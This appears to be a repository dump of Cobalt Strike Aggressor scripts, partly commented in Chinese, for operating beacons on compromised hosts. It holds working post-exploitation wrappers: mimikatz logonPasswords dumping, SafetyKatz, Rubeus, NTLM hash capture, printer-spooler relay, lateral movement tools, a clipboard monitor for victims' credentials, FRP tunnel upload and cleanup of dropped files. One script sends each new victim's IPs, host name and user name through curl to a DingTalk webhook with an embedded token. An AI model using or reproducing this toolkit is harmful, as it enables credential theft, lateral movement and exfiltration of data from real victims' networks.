beacon_command_register("SpoolSample", "打印机服务漏洞利用", 2 | "Usage: SpoolSample targetip relayip \n" . 3 | "Usage: sharpmapexec -h\n\n" . 4 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 5 | 6 | alias SpoolSample{ 7 | local('$bid $asm $desc @args $argu'); 8 | $bid = $1; 9 | $desc = "SpoolSample"; 10 | @args = @_; 11 | remove(@args, $bid); 12 | $argu = join(' ', @args); 13 | if ($argu eq ""){ 14 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 15 | } 16 | else{ 17 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 18 | } 19 | bexecute_assembly!($bid, script_resource("exe/SpoolSample.exe"), $argu); 20 | } 21 | -------------------------------------------------------------------------------- /scripts/cmd/clipboard_monitor.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("clipboard_monitor", "This will monitor a victims clipboard for changes - may be useful for credentials", 2 | "Usage: clipboard_monitor \n\n" . 3 | "Monitor a victims clipboard for changes - may be useful for credentials\n"); 4 | alias clipboard_monitor{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "Clipboard Monitor"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SharpClipboard.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/coffee.cna: -------------------------------------------------------------------------------- 1 | alias coffee{ 2 | # $args = substr($0, 6); 3 | bdllspawn($1, script_resource("dll/mimikatz.dll"),"privilege::debug sekurlsa::logonPasswords", "QAX", 5000, false); 4 | } -------------------------------------------------------------------------------- /scripts/cmd/cwd-in-beacon-status-bar.cna: -------------------------------------------------------------------------------- 1 | # 2 | # Simple Beacon console status bar enhancement showing Beacon's last known current 3 | # working directory path, as well as adding fixed-width to last-seen meter. 4 | # 5 | # Additionally, this script enhances 'cd' command to make it restore previous path 6 | # if "cd -" was issued (and previous path is known). 7 | # 8 | # Author: 9 | # Mariusz B. / mgeeky, '20 10 | # 11 | # (https://github.com/mgeeky) 12 | # 13 | 14 | global('%OPERATING_BEACONS'); 15 | %OPERATING_BEACONS = %(); 16 | 17 | beacon_command_register( 18 | "cd", 19 | "Change directory on host. Use '-' to get back to previous cwd.", 20 | "Use: cd [directory]\n\nChange directory on host. Use '-' to get back to previous cwd."); 21 | 22 | set BEACON_SBAR_LEFT { 23 | local('$hostname $username $pid $arch $pwd'); 24 | $hostname = $2["computer"]; 25 | $username = $2["user"]; 26 | $pid = $2["pid"]; 27 | $arch = $2["arch"]; 28 | $pwd = %OPERATING_BEACONS[$1]['cwd']; 29 | 30 | return "[\c2 $+ $hostname $+ \o] $username $+ / $+ $pid \cE( $+ $arch $+ )\o\c2 $pwd \o"; 31 | } 32 | 33 | set BEACON_SBAR_RIGHT { 34 | local('$note $last'); 35 | $note = $2["note"]; 36 | $last = $2["lastf"]; 37 | 38 | return "\c6 $note \cE(last: $+ $[5]last $+ )\o"; 39 | } 40 | 41 | on beacon_tasked { 42 | local('$pwd $sep'); 43 | 44 | if('cd *' iswm $2) { 45 | $pwd = substr($2, strlen("cd ")); 46 | $sep = iff(binfo($1, "os") eq "Windows", "\\", "/"); 47 | 48 | if($pwd eq "..") { 49 | $pwd = substr(%OPERATING_BEACONS[$1]['cwd'], 0, lindexOf(%OPERATING_BEACONS[$1]['cwd'], $sep)); 50 | 51 | if($pwd eq "..") { 52 | return "\cC[*]\o $2"; 53 | } 54 | } 55 | else if($pwd eq ".") { 56 | return "\cC[*]\o $2"; 57 | } 58 | else if((strlen($pwd) >= 2) && (charAt($pwd, 1) ne ":")) { 59 | # relative path? 60 | $pwd = %OPERATING_BEACONS[$1]['cwd'] . $sep . $pwd; 61 | } 62 | 63 | %OPERATING_BEACONS[$1]['prev-cwd'] = %OPERATING_BEACONS[$1]['cwd']; 64 | %OPERATING_BEACONS[$1]['cwd'] = $pwd; 65 | 66 | return "\cC[*]\o $2"; 67 | } 68 | } 69 | 70 | set BEACON_OUTPUT_ALT { 71 | local('$pwd'); 72 | 73 | if($2 ismatch 'Current directory is (.+)') { 74 | $pwd = matched()[0]; 75 | %OPERATING_BEACONS[$1]['prev-cwd'] = %OPERATING_BEACONS[$1]['cwd']; 76 | %OPERATING_BEACONS[$1]['cwd'] = $pwd; 77 | return "\cC[*]\o Current directory is \cC" . $pwd . "\o\n"; 78 | } 79 | 80 | return "\cC[*]\o $2\n"; 81 | } 82 | 83 | on beacon_input { 84 | if (["$3" trim] eq "ls") { 85 | %OPERATING_BEACONS[$1]['cwd-use-ls'] = 1; 86 | } 87 | } 88 | 89 | on beacon_output_ls { 90 | local('$pwd'); 91 | 92 | if(%OPERATING_BEACONS[$1]['cwd-use-ls'] == 1) { 93 | $pwd = split("\n", ["$2" trim])[0]; 94 | if(right($pwd, 2) eq "\\*") { 95 | $pwd = substr($pwd, 0, -2); 96 | } 97 | %OPERATING_BEACONS[$1]['prev-cwd'] = %OPERATING_BEACONS[$1]['cwd']; 98 | %OPERATING_BEACONS[$1]['cwd'] = $pwd; 99 | %OPERATING_BEACONS[$1]['cwd-use-ls'] = 0; 100 | } 101 | } 102 | 103 | on beacons { 104 | if(%OPERATING_BEACONS is $null) { 105 | %OPERATING_BEACONS = %(); 106 | } 107 | 108 | foreach $b ($1) { 109 | if(iff($b in keys(%OPERATING_BEACONS), "true", $null)) { 110 | %OPERATING_BEACONS[$b] = %(); 111 | } 112 | } 113 | } 114 | 115 | alias cd { 116 | if(($2 eq "-") && (strlen(%OPERATING_BEACONS[$1]['prev-cwd']) > 0)) { 117 | bcd($1, %OPERATING_BEACONS[$1]['prev-cwd']); 118 | return; 119 | } 120 | 121 | bcd($1, $2); 122 | } 123 | -------------------------------------------------------------------------------- /scripts/cmd/dazzleUP.cna: -------------------------------------------------------------------------------- 1 | alias dazzleUP { 2 | bdllspawn($1, script_resource("exe/dazzleUP_Reflective_DLL.dll"), $2, "dazzleUP", 5000, false); 3 | } 4 | -------------------------------------------------------------------------------- /scripts/cmd/dingding.cna: -------------------------------------------------------------------------------- 1 | $dt_token = "ed61be0adb7d3ad20a686e45499faa5721bd4a74f8e7ee04aefa894240643f57"; 2 | #$dt_token = "a9a4be2b08dfd85d1806d18d3cce68553953fc8473f331b187dc55f142ac0b0b"; 3 | 4 | $dt_bot_webhookURL = 'https://oapi.dingtalk.com/robot/send?access_token='.$dt_token; 5 | 6 | $targetInfo_txt = "## Wing,360送的快递到小邮局啦!\n>"; 7 | $listener_txt = "**所属项目:**"; 8 | $externalIp_txt = " \n >**公网IP:**"; 9 | $internalIp_txt = " \n >**内网IP:**"; 10 | $computerName_txt = " \n >**主机名:**"; 11 | $userName_txt = " \n >**当前用户:**"; 12 | 13 | 14 | on beacon_initial { 15 | local('$internalIP $computerName $userName'); 16 | $internalIP = replace(beacon_info($1, "internal"), " ", "_"); 17 | $externalIP = replace(beacon_info($1, "external"), " ", "_"); 18 | $computerName = replace(beacon_info($1, "computer"), " ", "_"); 19 | $userName = replace(beacon_info($1, "user"), " ", "_"); 20 | $listennerName = replace(beacon_info($1, "listener"), " ", "_"); 21 | $dt_msg = "{\"msgtype\": \"markdown\",\"markdown\": {\"title\":\"新主机上线\",\"text\":"."\"".$targetInfo_txt.$listener_txt.$listennerName.$externalIp_txt.$externalIP.$internalIp_txt.$internalIP.$computerName_txt.$computerName.$userName_txt.$userName."\""."}}"; 22 | @curl_command = @('curl', '-H', 'Content-Type: application/json', '-d', $dt_msg, $dt_bot_webhookURL); 23 | exec(@curl_command); 24 | bshell($1, "ipconfig /all"); 25 | } -------------------------------------------------------------------------------- /scripts/cmd/frp.cna: -------------------------------------------------------------------------------- 1 | popup beacon_bottom { 2 | menu "FrpSocks5"{ 3 | item "Upload" { 4 | local('$bid'); 5 | foreach $bid ($1){ 6 | upload($bid); 7 | } 8 | } 9 | 10 | item "Run"{ 11 | $bid = $1; 12 | show_message("传哪里自己手动执行 :XD"); 13 | # $dialog = dialog("Run frpc", %(uri => "http://x.x.x.x/frpc.ini or c:\\frpc.ini", bid => $bid), &run); 14 | # drow_text($dialog, "uri", "configURI: "); 15 | # dbutton_action($dialog, "ok"); 16 | # dialog_show($dialog); 17 | } 18 | 19 | 20 | } 21 | } 22 | 23 | sub upload{ 24 | local('$dialog %defaults $bid'); 25 | $bid = $1; 26 | # $ptype = "elevatedregistrykey"; 27 | 28 | %defaults["localpath"] = "/tmp/c"; 29 | %defaults["localconfigpath"] = "/tmp/c.ini"; 30 | %defaults["remotepath"] = "/tmp/c"; 31 | %defaults["remoteconfigpath"] = "/tmp/c.ini"; 32 | # %defaults["droplocation"] = %persistdefaults["droplocation"]; 33 | # %defaults["customfile"] = %persistdefaults["customfile"]; 34 | # %defaults["listener"] = %persistdefaults["listener"]; 35 | # %defaults["template"] = %persistdefaults["template"]; 36 | 37 | $dialog = dialog("FRP Upload", %defaults, lambda({ 38 | # bexecute_assembly($bid,script_resource("/exe/Xshell.exe")," -Xshell ".$3["path"]." ".$3["uid"]) 39 | # }, \$bid, \$3) 40 | bupload($bid,$3["localpath"]); 41 | bupload($bid,$3["localconfigpath"]); 42 | bmv($bid, $3["remotepath"], $3["remotepath"]) 43 | bmv($bid, $3["localconfigpath"], $3["remoteconfigpath"]) 44 | },\$bid, \$3) 45 | ); 46 | dialog_description($dialog, "请输入路径"); 47 | drow_text($dialog, "localpath", "本地路径"); 48 | drow_text($dialog, "localconfigpath", "本地配置"); 49 | drow_text($dialog, "remotepath", "远程路径"); 50 | drow_text($dialog, "remoteconfigpath", "远程配置"); 51 | dbutton_action($dialog, "Execute"); 52 | dialog_show($dialog); 53 | } 54 | 55 | popup ssh { 56 | menu "Frp"{ 57 | item "Upload" { 58 | local('$bid'); 59 | foreach $bid ($1){ 60 | upload($bid); 61 | } 62 | } 63 | 64 | 65 | item "Run"{ 66 | $bid = $1; 67 | show_message("传哪里自己手动执行 :XD"); 68 | # $dialog = dialog("Run frpc", %(uri => "http://x.x.x.x/frpc.ini or c:\\frpc.ini", bid => $bid), &run); 69 | # drow_text($dialog, "uri", "configURI: "); 70 | # dbutton_action($dialog, "ok"); 71 | # dialog_show($dialog); 72 | } 73 | 74 | 75 | } 76 | } 77 | 78 | sub upload{ 79 | local('$dialog %defaults $bid'); 80 | $bid = $1; 81 | # $ptype = "elevatedregistrykey"; 82 | 83 | %defaults["localpath"] = "/tmp/c"; 84 | %defaults["localconfigpath"] = "/tmp/c.ini"; 85 | %defaults["remotepath"] = "/tmp/c"; 86 | %defaults["remoteconfigpath"] = "/tmp/c.ini"; 87 | # %defaults["droplocation"] = %persistdefaults["droplocation"]; 88 | # %defaults["customfile"] = %persistdefaults["customfile"]; 89 | # %defaults["listener"] = %persistdefaults["listener"]; 90 | # %defaults["template"] = %persistdefaults["template"]; 91 | 92 | $dialog = dialog("FRP Upload", %defaults, lambda({ 93 | # bexecute_assembly($bid,script_resource("/exe/Xshell.exe")," -Xshell ".$3["path"]." ".$3["uid"]) 94 | # }, \$bid, \$3) 95 | bupload($bid,$3["localpath"]); 96 | bupload($bid,$3["localconfigpath"]); 97 | bmv($bid, $3["remotepath"], $3["remotepath"]) 98 | bmv($bid, $3["localconfigpath"], $3["remoteconfigpath"]) 99 | },\$bid, \$3) 100 | ); 101 | dialog_description($dialog, "请输入路径"); 102 | dialog_description($dialog, "请输入路径"); 103 | drow_text($dialog, "localpath", "本地FRP路径"); 104 | drow_text($dialog, "localconfigpath", "本地ini路径"); 105 | drow_text($dialog, "remotepath", "远程FRP路径"); 106 | drow_text($dialog, "remoteconfigpath", "远程ini路径"); 107 | dbutton_action($dialog, "Execute"); 108 | dialog_show($dialog); 109 | } -------------------------------------------------------------------------------- /scripts/cmd/internal-monologue_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("internal_monologue", "调用本地包进行NTLM认证,抓取hash", 2 | "Usage: internal_monologue \n\n" . 3 | "Uses execute-assembly to run the assembly. No arguments needed \n"); 4 | alias internal_monologue{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "InternalMonologue"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/InternalMonologue.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/leave_no_trace.cna: -------------------------------------------------------------------------------- 1 | #### LeaveNoTrace #### 2 | ## Keep track of dropped files to clean up environment later. 3 | ## Author: Alyssa (ramen0x3f) 4 | ## Last Updated: 2018-09-26 5 | 6 | ## Usage: ## 7 | # View > "Leave No Trace". Click column to sort. 8 | # (By default all items show as Status: ?. Click "Check for litter" to update.) 9 | # 10 | # Right click items 11 | # > "Search and Destroy" tries to remove items from the chosen beacon 12 | # > "Check for litter" 13 | # - Does an LS to look for the dest_file from the chosen beacon 14 | # - Updates left column of results with status (cleaned, NOT cleaned, ?) 15 | 16 | ## Coming soon: ## 17 | # - Additional options to specify directories/paths (in cases dest_file was the filename only) 18 | # - Track bcp() calls in archives too instead of just bupload() 19 | # - Add interesting filenames/directories to compromised_log.rpt for easier reporting to blue team 20 | 21 | ## FAIR WARNING ## 22 | # If you select a dest_file that has only the filename (not a full path as well) this will fail. 23 | # I'm sorry - it's not my fault. It's all I could pull from the archives/upload event. 24 | 25 | ## CREDIT ## 26 | # This script uses the awesome visualization/tab code by @001SPARTaN (for @r3dqu1nn) 27 | # As seen on tv: https://github.com/harleyQu1nn/AggressorScripts/blob/master/logvis.cna 28 | 29 | ################################################################################# 30 | ## Imports ## 31 | ############# 32 | import ui.*; 33 | import table.*; 34 | import java.awt.*; 35 | import javax.swing.*; 36 | import javax.swing.table.*; 37 | 38 | global('$model $console $table %looking @directories @filenames @targets'); 39 | 40 | ################################################################################# 41 | ## Functions ## 42 | ############### 43 | sub check_for_litter { 44 | ## Callback for "Check for litter" right click menu option 45 | ## Does an LS on each dest directory from the specified beacon id 46 | 47 | #Set variables 48 | local('$bid $host $dir $d $dir %files %details'); 49 | $bid = $3['bid']; 50 | 51 | foreach $host => %files (%looking) { #Get each host we're looking for 52 | foreach $dir => %details (%files) { #Check each directory/item under the host 53 | if ( %details['update'] ) { #See if we're looking for it right now 54 | $d = strrep(join("\\", sublist(split("\\\\", $dir), 0, -1)), ':', '$'); #Parse directory 55 | println("Looking in $d on $host from $bid"); 56 | bls($bid, "\\\\" . $host . "\\" . $d, &search_callback); 57 | } 58 | } 59 | } 60 | } 61 | 62 | sub create_vis { 63 | ## This is the fancy code from @001SPARTaN and @r3dqu1nn 64 | 65 | this('$client'); 66 | local('$sorter $content'); 67 | # GenericTableModel from table.* 68 | # Columns for each data model 69 | 70 | #####Taking our source_file for now 71 | #$model = [new GenericTableModel: @(beacon_pid", "beacon_ip", "beacon_user", "source_file", "dest_file"), "beacon", 16]; 72 | 73 | $model = [new GenericTableModel: @("status", "beacon_id", "beacon_ip", "beacon_user", "dest_file"), "beacon", 16]; 74 | 75 | # Create a table from the GenericTableModel 76 | $table = [new ATable: $model]; 77 | 78 | # Controls how the column headers will sort the table 79 | $sorter = [new TableRowSorter: $model]; 80 | [$sorter toggleSortOrder: 3]; 81 | 82 | [$sorter setComparator: 0, { 83 | return $1 cmp $2; 84 | }]; 85 | 86 | [$sorter setComparator: 1, { 87 | return $1 cmp $2; 88 | }]; 89 | 90 | [$sorter setComparator: 2, { 91 | return $1 cmp $2; 92 | }]; 93 | 94 | [$sorter setComparator: 3, { 95 | return $1 <=> $2; 96 | }]; 97 | 98 | # Set $sorter as the row sorter for $table 99 | [$table setRowSorter: $sorter]; 100 | 101 | # Create a split pane (divider you can drag around) 102 | $content = [new JScrollPane: $table]; 103 | 104 | # Set popup menu for the table 105 | setup_popup($table, "menu"); 106 | 107 | update_table(); 108 | 109 | # Register the visualization with CS 110 | addVisualization("Leave No Trace", $content); 111 | return $content; 112 | } 113 | 114 | sub destroy_callback { 115 | ## Callback for the LS from the "Search and Destroy" command 116 | ## Parses directory listing and removes designated files 117 | ## Note: I wrote this first so it's probably not the best it could be. 118 | 119 | local('$host $temp'); 120 | @results = split("\n", $3); 121 | removeAt(@results, 0); 122 | $host = split('\\\\', $2)[2]; 123 | 124 | if ( size(@results) ) { 125 | foreach %r (@results) { 126 | @x = split("\t", %r); 127 | if ( @x[0] !ismatch 'D' && @x[-1] in @filenames ) { #Check if file matches interesting ones 128 | $temp = $dir . "\\" . @x[-1]; 129 | 130 | blog($1, ">> FOUND: " . $2 . "\\" . @x[-1]); 131 | println(">> REMOVING: " . $2 . "\\" . @x[-1]); 132 | brm($1, $2 . "\\" . @x[-1]); #Destroy 133 | 134 | %looking[$host][$temp]['status'] = 'NOT cleaned'; #Update for the Leave No Trace tab 135 | %looking[$host][$temp]['update'] = 0; 136 | update_table(); 137 | } 138 | } 139 | } 140 | return; 141 | } 142 | 143 | sub search_and_destroy { 144 | ## Callback for "Search and Destroy" right click menu option 145 | ## Does an LS on each dest directory from the specified beacon id and removes interesting files 146 | 147 | $bid = $3['bid']; 148 | foreach $d (@directories) { #Change to UNC path for bls() 149 | $d = strrep($d, ':', '$'); 150 | } 151 | 152 | foreach $tar (@targets) { 153 | foreach $dir (@directories) { 154 | blog($bid, "Searching \\\\" . $tar . "\\" . $dir); 155 | bls($bid, "\\\\" . $tar . "\\" . $dir, &destroy_callback); 156 | } 157 | } 158 | } 159 | 160 | sub search_archives { 161 | ## Parses archives to pull out uploads for the Leave No Trace tab 162 | ## Returns all the items to add to the model 163 | 164 | local('$ip $dir $dest $status @uploads @bids %entry $parse $bid'); 165 | @uploads = @(); 166 | @bids = beacon_ids(); 167 | 168 | foreach %entry (data_query("archives")) { 169 | #Pull out interesting archives 170 | if( %entry['data'] ismatch 'upload .* as .*') { 171 | $parse = replace(%entry['data'], 'upload ', ''); 172 | ($source, $dest) = split(' as ', $parse); 173 | 174 | $bid = %entry['bid']; 175 | if ( $bid !in @bids ) { 176 | continue; 177 | } 178 | 179 | #Get IP and directory 180 | if ( $dest !hasmatch '^\\\\' ) { 181 | $ip = beacon_info($bid, "internal"); 182 | $dir = $dest; 183 | } 184 | #If UNC path in dest_file, parse out IP 185 | else { 186 | $ip = split('\\\\', $dest)[2]; 187 | $dir = join('\\', sublist(split('\\\\', $dest), 3)); 188 | } 189 | 190 | #Set status if we've already checked its status 191 | if ( $ip in %looking && $dir in %looking[$ip] ) { 192 | $status = %looking[$ip][$dir]['status']; 193 | } 194 | else { 195 | $status = "?"; 196 | } 197 | 198 | #Add to array 199 | add(@uploads, %(beacon_pid => beacon_info($bid, "pid"), source_file => $source, dest_file => $dest, beacon_user => beacon_info($bid, "user"), beacon_ip => $ip, beacon_id => $bid, status => $status)); 200 | } 201 | } 202 | 203 | return @uploads; 204 | } 205 | 206 | sub search_callback { 207 | local('$host @results $dir %r @x $item %details'); 208 | @results = split("\n", $3); 209 | removeAt(@results, 0); 210 | $host = split('\\\\', $2)[2]; 211 | $dir = join('\\', sublist(split('\\\\', $2), 3)); 212 | 213 | if ( size(@results) ) { 214 | foreach %r (@results) { 215 | @x = split("\t", %r); 216 | if ( @x[0] !ismatch 'D' ) { 217 | $temp = $dir . "\\" . @x[-1]; 218 | if ( $temp in %looking[$host] && %looking[$host][$temp]['update'] == 1 ) { 219 | println("Found $temp on $host"); 220 | %looking[$host][$temp]['status'] = 'NOT cleaned'; 221 | %looking[$host][$temp]['update'] = 0; 222 | update_table(); 223 | return; 224 | } 225 | } 226 | } 227 | println("Didn't find anything"); 228 | foreach $item => %details (%looking[$host]) { 229 | if ( %details['update'] && $dir isin $item ) { 230 | println("Marking $item as cleaned on $host"); 231 | %details['status'] = 'cleaned'; 232 | %details['update'] = 0; 233 | } 234 | } 235 | } 236 | println("Updating table"); 237 | update_table(); 238 | return; 239 | } 240 | 241 | sub setup_popup { 242 | # setup_popup provided by Raphael Mudge 243 | # https://gist.github.com/rsmudge/87ce80cd8d8d185c5870d559af2dc0c2 244 | # we're using fork({}) to run this in a separate Aggressor Script environment. 245 | # This reduces deadlock potential due to Sleep's global interpreter lock 246 | # 247 | # this especially matters as our mouse listener will be fired for *everything* 248 | # to include mouse movements. 249 | fork({ 250 | [$component addMouseListener: lambda({ 251 | if ([$1 isPopupTrigger]) { 252 | # If right click, show popup 253 | show_popup($1, $name, $component); 254 | } 255 | }, \$component, \$name)]; 256 | }, $component => $1, $name => $2, $model => $model, $table => $table); 257 | } 258 | 259 | sub update_table { 260 | ## Updates the Leave No Trace tab 261 | ## As a note: when you fork() you have to pass all global 262 | ## variables (see \$model and \%looking) or you'll go insane. 263 | 264 | fork({ 265 | local('%entry'); 266 | 267 | # Clear the model so we can put new stuff in it. 268 | [$model clear: 1024]; 269 | 270 | foreach %entry (search_archives()) { 271 | # Add the new entry to $model 272 | [$model addEntry: %entry]; 273 | } 274 | # Update with the new table 275 | [$model fireListeners]; 276 | }, \$model, \%looking); 277 | } 278 | 279 | ################################################################################# 280 | ## Pop Ups ## 281 | ############# 282 | popup menu { 283 | item "Search and Destroy" { 284 | local('$dir $dest $file $ip'); 285 | 286 | #Get ready 287 | clear(@filenames); 288 | clear(@targets); 289 | clear(@directories); 290 | 291 | #A little inner dialog 292 | $dialog = dialog("Search and Destroy", %(bid => $null), &search_and_destroy); 293 | dialog_description($dialog, "FAIR WARNING: if you select a dest_file that has only the filename (not a full path as well) this will fail. I'm sorry - it's not my fault. It's all I could pull from the archives/upload event."); 294 | drow_beacon($dialog, "bid", "Beacon to search from: "); 295 | dbutton_action($dialog, "Destroy"); 296 | dialog_show($dialog); 297 | 298 | #Make a list 299 | foreach $row ([$table getSelectedRows]) { 300 | $dest = [$model getValueAt: $row, 4]; 301 | $file = split('\\\\', $dest)[-1]; 302 | add(@filenames, $file); 303 | 304 | #Check it twice 305 | if ( $dest !hasmatch '^\\\\' ) { 306 | add(@targets, [$model getValueAt: $row, 2]); #IP 307 | $dir = join('\\', sublist(split('\\\\', $dest), 0, -1)); 308 | add(@directories, $dir); 309 | } 310 | else { 311 | add(@targets, split('\\\\', $dest)[2]); #IP 312 | $dir = join('\\', sublist(split('\\\\', $dest), 3, -1)); 313 | add(@directories, $dir); 314 | } 315 | } 316 | } 317 | 318 | item "Check for litter" { 319 | local('$dir $dest $ip $host $row $dialog %folders'); 320 | foreach $host => %folders (%looking) { 321 | foreach $dir => %details (%folders) { 322 | %details['update'] = 0; 323 | } 324 | } 325 | 326 | #Make a list 327 | foreach $row ([$table getSelectedRows]) { 328 | $dest = [$model getValueAt: $row, 4]; 329 | 330 | #Check it twice 331 | if ( $dest !hasmatch '^\\\\' ) { 332 | $ip = [$model getValueAt: $row, 2]; 333 | $dir = $dest; 334 | } 335 | else { 336 | $ip = split('\\\\', $dest)[2]; 337 | $dir = join('\\', sublist(split('\\\\', $dest), 3)); 338 | } 339 | 340 | if ( $ip in %looking && $dir in %looking[$ip] ) { 341 | %looking[$ip][$dir]['update'] = 1; 342 | } 343 | else { 344 | %looking[$ip][$dir] = %(status => '?', update => 1); 345 | } 346 | } 347 | 348 | #A little inner dialog 349 | $dialog = dialog("Check for litter", %(bid => $null), &check_for_litter); 350 | dialog_description($dialog, "FAIR WARNING: if you select a dest_file that has only the filename (not a full path as well) this will fail. I'm sorry - it's not my fault. It's all I could pull from the archives/upload event."); 351 | drow_beacon($dialog, "bid", "Beacon to search from: "); 352 | dbutton_action($dialog, "Check"); 353 | dialog_show($dialog); 354 | } 355 | } 356 | 357 | popup view { 358 | item "文件上传历史记录" { 359 | # Show the visualization 360 | addTab("Leave No Trace", create_vis(), "All uploaded/dropped files"); 361 | } 362 | } 363 | -------------------------------------------------------------------------------- /scripts/cmd/rubeus_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("rubeus", "Executes Rubeus assembly", 2 | "Usage: rubeus [arguments]\n\n" . 3 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 4 | alias rubeus{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "Rubeus"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/Rubeus.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/safetykatz_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("safetykatz", "Creates minidump of lsass, loads custom mimikatz, steals creds, deletes minidump", 2 | "Usage: safetykatz \n\n" . 3 | "Uses execute-assembly to run the assembly and steal credentials\n"); 4 | alias safetykatz{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "SafetyKatz"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SafetyKatz.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/sessionsearcher_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("searchsessions", "Searches all connected drives for PuTTY private keys and RDP connection files and parses them for relevant details.", 2 | "Usage: searchsessions [arguments]\n\n" . 3 | "Uses execute-assembly to run the assembly No Arguments Required\n"); 4 | alias searchsessions{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "SearchSessions"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SearchSessions.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/sharpcom_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("sharpcom", "Execute's commands via various DCOM methods as demonstrated by (@enigma0x3) C#", 2 | "Usage: sharpcom [arguments]\n\n" . 3 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 4 | alias sharpcom{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "SharpCOM"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SharpCOM.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/sharpmapexec_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("sharpmapexec", ".NET横向移动工具", 2 | "Usage: sharpmapexec ntlm smb /user:USER /ntlm:HASH /domain:DOMAIN /computername:TARGETn\n" . 3 | "Usage: sharpmapexec -h\n\n" . 4 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 5 | 6 | alias sharpmapexec{ 7 | local('$bid $asm $desc @args $argu'); 8 | $bid = $1; 9 | $desc = "sharpmapexec"; 10 | @args = @_; 11 | remove(@args, $bid); 12 | $argu = join(' ', @args); 13 | if ($argu eq ""){ 14 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 15 | } 16 | else{ 17 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 18 | } 19 | bexecute_assembly!($bid, script_resource("exe/SharpMapExec.exe"), $argu); 20 | } 21 | -------------------------------------------------------------------------------- /scripts/cmd/sharprelay_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("sharprelay", "sharprelay tools", 2 | "Usage: sharprelay servername dllpath 445 DIYPORT\n\n" . 3 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 4 | alias sharprelay{ 5 | local('$bid $asm $desc @args $argu'); 6 | $bid = $1; 7 | $desc = "sharprelay"; 8 | @args = @_; 9 | remove(@args, $bid); 10 | $argu = join(' ', @args); 11 | if ($argu eq ""){ 12 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 13 | } 14 | else{ 15 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc \'$argu\'"); 16 | } 17 | bexecute_assembly!($bid, script_resource("exe/SharpRelay.exe"), $argu); 18 | } 19 | -------------------------------------------------------------------------------- /scripts/cmd/sharpsniper_alias.cna: -------------------------------------------------------------------------------- 1 | beacon_command_register("sharpsniper", "Simple tool to find the IP address of users, must have read privs on DC", 2 | "Usage: sharpsniper emusk DomainAdminUser DAPass123\n\n" . 3 | "Usage: sharpsniper emusk\n\n" . 4 | "Uses execute-assembly to run the assembly and takes given arguments\n"); 5 | alias sharpsniper{ 6 | local('$bid $asm $desc @args $argu'); 7 | $bid = $1; 8 | $desc = "SharpSniper"; 9 | @args = @_; 10 | remove(@args, $bid); 11 | $argu = join(' ', @args); 12 | if ($argu eq ""){ 13 | blog2($bid, "" . dstamp(ticks()) . " Executing $desc"); 14 | } 15 | 